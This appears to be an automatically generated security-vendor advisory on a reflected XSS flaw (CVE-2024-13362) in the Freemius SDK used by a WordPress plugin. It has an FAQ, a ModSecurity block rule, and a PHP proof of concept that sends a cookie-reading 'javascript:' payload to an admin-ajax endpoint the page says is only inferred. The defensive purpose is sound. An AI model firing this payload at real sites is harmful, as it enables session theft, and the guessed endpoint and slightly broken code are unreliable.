What is CVE-2024-13362?

CVE-2024-13362 is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK library, affecting versions 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter, potentially compromising user sessions.

Who is affected by this vulnerability?

WordPress sites using the ‘Widgets on Pages’ plugin version 1.7 or earlier that integrate the Freemius SDK are affected. Administrators should check their installed plugins for this version and the Freemius SDK version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check for vulnerability, verify if your site uses the ‘Widgets on Pages’ plugin version 1.7 or earlier and if the Freemius SDK is version 2.10.1 or earlier. Review the plugin’s changelog or codebase to confirm the versions in use.

What does the CVSS score of 6.1 mean?

The CVSS score of 6.1 indicates a medium severity vulnerability. This means that while exploitation requires user interaction, the potential impact on confidentiality and integrity is significant, as it can lead to session hijacking and other malicious actions.

How does this vulnerability work?

The vulnerability allows an attacker to craft a malicious link containing a JavaScript payload in the ‘url’ parameter. When a victim clicks the link, the script executes in their browser, allowing the attacker to steal cookies or redirect the user.

What are the practical risks of this vulnerability?

Exploitation can lead to session hijacking, where attackers gain access to user accounts, or defacement of the site. Attackers may also redirect users to phishing sites, compromising sensitive information.

How can I fix this vulnerability?

To fix the vulnerability, update the Freemius SDK to version 2.10.2 or later. Additionally, ensure proper output escaping of the ‘url’ parameter using WordPress functions like esc_url() and esc_js() to prevent XSS.

What additional security measures should I take?

In addition to updating the SDK, consider implementing nonce verification with wp_create_nonce() for actions that process the ‘url’ parameter. Regularly audit your plugins and themes for vulnerabilities and apply updates promptly.

What is the proof of concept for this vulnerability?

The proof of concept illustrates how an attacker can exploit the vulnerability by crafting a URL that includes a JavaScript payload. It demonstrates the process of sending a malicious link to a user, leading to the execution of the attacker’s script.

Are there any known exploits for this vulnerability?

As of now, there are no publicly reported exploits specifically targeting CVE-2024-13362, but the nature of XSS vulnerabilities means that they can be easily exploited if the conditions are met.

What should I do if I am unable to update the SDK?

If you cannot update the SDK immediately, consider disabling the affected plugin as a temporary measure. Additionally, review your site’s security settings and educate users about the risks of clicking unknown links.

Where can I find more information about this vulnerability?

For more information, refer to the official CVE database, security advisories from the plugin developers, and reputable security blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (widgets-on-pages)

CVE ID CVE-2024-13362

Plugin widgets-on-pages

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.7

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) found in the Freemius SDK library (version 2.10.1 and earlier) used by multiple WordPress plugins and themes, including the ‘Widgets on Pages’ plugin (version 1.7). An unauthenticated attacker can inject arbitrary JavaScript into a page via the `url` parameter. The attack requires user interaction (clicking a crafted link). The CVSS score is 6.1 (Medium), reflecting network-based, low-complexity exploitation with no privileges required.

Root Cause: Based on the CWE-79 classification and vulnerability description, the root cause is improper neutralization of user-supplied input in the `url` parameter during web page generation. Atomic Edge research infers that the Freemius SDK likely processes a `url` parameter from the query string (or POST body) and reflects it directly into the page’s DOM without proper sanitization or output escaping. This is a classic reflected XSS pattern where the vulnerable code writes user input into the HTML response (e.g., via `window.location` or `innerHTML` assignment). No code diff is available, so this conclusion is inferred from the CWE and description rather than confirmed from source code.

Exploitation: An attacker crafts a malicious link containing a JavaScript payload in the `url` parameter. For a WordPress plugin like ‘Widgets on Pages’, the endpoint is likely an AJAX action or a shortcode handler that calls Freemius SDK functions. Based on the plugin slug and common Freemius integration patterns, the vulnerable URL might target a Freemius-related AJAX handler (e.g., `/wp-admin/admin-ajax.php?action=fs_connect&url=javascript:alert(document.cookie)`) or a custom endpoint that processes the `url` parameter. The attacker sends this link to a logged-in user (e.g., via email or social engineering). When the victim clicks the link, the browser sends a request to the vulnerable endpoint, which reflects the malicious payload into the page. The script executes in the victim’s session context, allowing the attacker to steal cookies, session tokens, or redirect the user to phishing sites.

Remediation: The fix requires proper output escaping of the `url` parameter before reflecting it into the page. WordPress provides functions like `esc_url()` for URL sanitization and `esc_js()` or `esc_html()` for JavaScript/HTML context escaping. Since this is a DOM-based XSS, the developer must also ensure that the SDK never uses unescaped input in DOM manipulation (e.g., `document.write()`, `innerHTML`, or `eval()`). The plugin author should also consider using `wp_create_nonce()` and verifying the nonce before processing the `url` parameter to prevent cross-site request forgery (CSRF) components of the attack. If the plugin uses the Freemius SDK, an SDK update to version 2.10.2 or later is the recommended fix.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the context of the WordPress site. This can lead to session hijacking (stealing authentication cookies), defacement of the page, redirection to malicious sites, or phishing for credentials. The CVSS impact is limited to Low confidentiality and Low integrity (no availability impact). However, the attacker can perform any action the victim can, including posting comments, creating new admin users if the victim is an administrator (depending on the plugin’s capabilities), and exfiltrating sensitive data displayed on the page.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected XSS via 'url' parameter in Freemius AJAX handlers
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter in Freemius SDK',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_POST:action "@rx ^fs_" "chain"
    SecRule ARGS_POST:url "@rx (?:javascript|data|vbscript):" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC demonstrates exploitation of reflected XSS via the 'url' parameter
// against a WordPress site using a vulnerable Freemius SDK version.
// The endpoint is inferred from common Freemius AJAX patterns.

$target_url = 'http://example.com'; // Change this to the target WordPress URL

// Craft the malicious payload: a Javascript alert that displays the document's cookies
$payload = 'javascript:alert(document.cookie)';

// Build the exploit URL.
// Assumed vulnerable endpoint: /wp-admin/admin-ajax.php?action=fs_connect&url=PAYLOAD
// If this specific action does not exist, adjust 'action' parameter based on the plugin's actual integration.
$exploit_url = $target_url . '/wp-admin/admin-ajax.php?action=fs_connect&url=' . urlencode($payload);

echo "[+] Targeting: $target_urln";
echo "[+] Exploit URL: $exploit_urln";
echo "[+] Sending request...n";

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
    echo "[!] cURL error: $errorn";
    exit(1);
}

echo "[+] HTTP response code: $http_coden";

// Check if the payload appears in the response body (indicating reflection)
if (strpos($response, $payload) !== false) {
    echo "[+] SUCCESS: The payload was reflected in the response. The site is vulnerable.n";
} else {
    echo "[-] The payload was not reflected. The site may be patched or the endpoint is different.n";
    echo "[-] Try adjusting the 'action' parameter in the exploit URL to match the actual Freemius integration.n";
}

// Print partial response for debugging
echo "n[+] Response snippet:n";
echo substr($response, 0, 500) . "n";
?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK library, affecting versions 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter, potentially compromising user sessions.
Who is affected by this vulnerability?
Identifying impacted users
WordPress sites using the ‘Widgets on Pages’ plugin version 1.7 or earlier that integrate the Freemius SDK are affected. Administrators should check their installed plugins for this version and the Freemius SDK version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify if your site uses the ‘Widgets on Pages’ plugin version 1.7 or earlier and if the Freemius SDK is version 2.10.1 or earlier. Review the plugin’s changelog or codebase to confirm the versions in use.
What does the CVSS score of 6.1 mean?
Understanding risk levels
The CVSS score of 6.1 indicates a medium severity vulnerability. This means that while exploitation requires user interaction, the potential impact on confidentiality and integrity is significant, as it can lead to session hijacking and other malicious actions.
How does this vulnerability work?
Mechanics of the attack
The vulnerability allows an attacker to craft a malicious link containing a JavaScript payload in the ‘url’ parameter. When a victim clicks the link, the script executes in their browser, allowing the attacker to steal cookies or redirect the user.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation can lead to session hijacking, where attackers gain access to user accounts, or defacement of the site. Attackers may also redirect users to phishing sites, compromising sensitive information.
How can I fix this vulnerability?
Remediation steps
To fix the vulnerability, update the Freemius SDK to version 2.10.2 or later. Additionally, ensure proper output escaping of the ‘url’ parameter using WordPress functions like esc_url() and esc_js() to prevent XSS.
What additional security measures should I take?
Enhancing site security
In addition to updating the SDK, consider implementing nonce verification with wp_create_nonce() for actions that process the ‘url’ parameter. Regularly audit your plugins and themes for vulnerabilities and apply updates promptly.
What is the proof of concept for this vulnerability?
Understanding the demonstration
The proof of concept illustrates how an attacker can exploit the vulnerability by crafting a URL that includes a JavaScript payload. It demonstrates the process of sending a malicious link to a user, leading to the execution of the attacker’s script.
Are there any known exploits for this vulnerability?
Current threat landscape
As of now, there are no publicly reported exploits specifically targeting CVE-2024-13362, but the nature of XSS vulnerabilities means that they can be easily exploited if the conditions are met.
What should I do if I am unable to update the SDK?
Alternative mitigation strategies
If you cannot update the SDK immediately, consider disabling the affected plugin as a temporary measure. Additionally, review your site’s security settings and educate users about the risks of clicking unknown links.
Where can I find more information about this vulnerability?
Resources for further reading
For more information, refer to the official CVE database, security advisories from the plugin developers, and reputable security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations